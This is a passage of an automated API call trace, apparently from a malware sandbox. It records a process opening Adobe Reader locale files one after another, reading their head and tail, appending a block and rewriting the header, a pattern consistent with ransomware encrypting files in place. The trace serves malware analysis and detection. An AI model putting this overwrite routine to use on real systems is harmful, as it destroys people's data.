lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.087] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.087] ReleaseMutex (hMutex=0x168) returned 1 [0075.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.NOR", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0075.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.NOR", cchWideChar=19, lpMultiByteStr=0x1f88a64, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.NOR", lpUsedDefaultChar=0x0) returned 19 [0075.087] ReadFile (in: hFile=0x1e8, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0075.089] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0075.089] WriteFile (in: hFile=0x1e8, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x345f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0075.089] CloseHandle (hObject=0x1e8) returned 1 [0075.089] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\IA32.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\ia32.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0075.090] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.090] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe00 [0075.091] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.091] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.091] ReleaseMutex (hMutex=0x168) returned 1 [0075.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.NOR", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0075.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.NOR", cchWideChar=8, lpMultiByteStr=0x1f7358c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.NOR", lpUsedDefaultChar=0x0) returned 8 [0075.091] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0075.093] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0075.093] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0075.093] CloseHandle (hObject=0x1e8) returned 1 [0075.093] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\SaveAsRTF.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\saveasrtf.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0075.094] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.094] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4600 [0075.094] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.094] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.094] ReleaseMutex (hMutex=0x168) returned 1 [0075.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.NOR", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.NOR", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.NOR", lpUsedDefaultChar=0x0) returned 13 [0075.095] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.096] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3600 [0075.096] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.097] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3600 [0075.097] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.098] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0075.098] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0075.098] CloseHandle (hObject=0x1e8) returned 1 [0075.098] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\accessibility.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\accessibility.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0075.099] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.099] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xae00 [0075.099] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.099] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.099] ReleaseMutex (hMutex=0x168) returned 1 [0075.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.NLD", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.100] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.NLD", cchWideChar=17, lpMultiByteStr=0x1f88a64, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.NLD", lpUsedDefaultChar=0x0) returned 17 [0075.100] ReadFile (in: hFile=0x1e8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.102] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9e00 [0075.102] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.103] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9e00 [0075.103] WriteFile (in: hFile=0x1e8, lpBuffer=0x2669498*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669498*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.104] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0075.104] WriteFile (in: hFile=0x1e8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.104] CloseHandle (hObject=0x1e8) returned 1 [0075.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\eBook.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\ebook.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0075.105] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.105] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1c00 [0075.105] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.105] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.105] ReleaseMutex (hMutex=0x168) returned 1 [0075.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.NLD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0075.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.NLD", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.NLD", lpUsedDefaultChar=0x0) returned 9 [0075.105] ReadFile (in: hFile=0x1e8, lpBuffer=0x2669498, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2669498*, lpNumberOfBytesRead=0x345f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0075.111] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0075.111] WriteFile (in: hFile=0x1e8, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x345f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0075.111] CloseHandle (hObject=0x1e8) returned 1 [0075.111] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\ReadOutLoud.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\readoutloud.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0075.112] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.112] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2c00 [0075.112] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.112] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.112] ReleaseMutex (hMutex=0x168) returned 1 [0075.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.NLD", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0075.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.NLD", cchWideChar=15, lpMultiByteStr=0x1f7340c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.NLD", lpUsedDefaultChar=0x0) returned 15 [0075.112] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.114] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1c00 [0075.114] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.119] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1c00 [0075.119] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.120] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0075.120] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0075.120] CloseHandle (hObject=0x1e8) returned 1 [0075.120] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\updater.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\updater.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0075.122] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.122] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2a00 [0075.122] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.123] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.123] ReleaseMutex (hMutex=0x168) returned 1 [0075.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.NLD", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.NLD", cchWideChar=11, lpMultiByteStr=0x1f732cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.NLD", lpUsedDefaultChar=0x0) returned 11 [0075.123] ReadFile (in: hFile=0x1e8, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.804] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a00 [0075.804] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.817] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a00 [0075.817] WriteFile (in: hFile=0x1e8, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.818] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0075.818] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0075.818] CloseHandle (hObject=0x1e8) returned 1 [0075.818] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\DigSig.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\digsig.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0075.821] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.821] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1f000 [0075.821] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.821] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.821] ReleaseMutex (hMutex=0x168) returned 1 [0075.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.POL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.POL", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.POL", lpUsedDefaultChar=0x0) returned 10 [0075.821] ReadFile (in: hFile=0x1e8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.844] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1e000 [0075.845] ReadFile (in: hFile=0x1e8, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.846] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1e000 [0075.846] WriteFile (in: hFile=0x1e8, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.846] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0075.847] WriteFile (in: hFile=0x1e8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.847] CloseHandle (hObject=0x1e8) returned 1 [0075.847] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\PPKLite.POL" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\ppklite.pol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0075.857] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.857] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7e800 [0075.857] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.857] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.857] ReleaseMutex (hMutex=0x168) returned 1 [0075.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.POL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.POL", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLite.POL", lpUsedDefaultChar=0x0) returned 11 [0075.858] ReadFile (in: hFile=0x1e8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0075.861] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7d800 [0075.861] ReadFile (in: hFile=0x1e8, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.867] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7d800 [0075.868] WriteFile (in: hFile=0x1e8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: 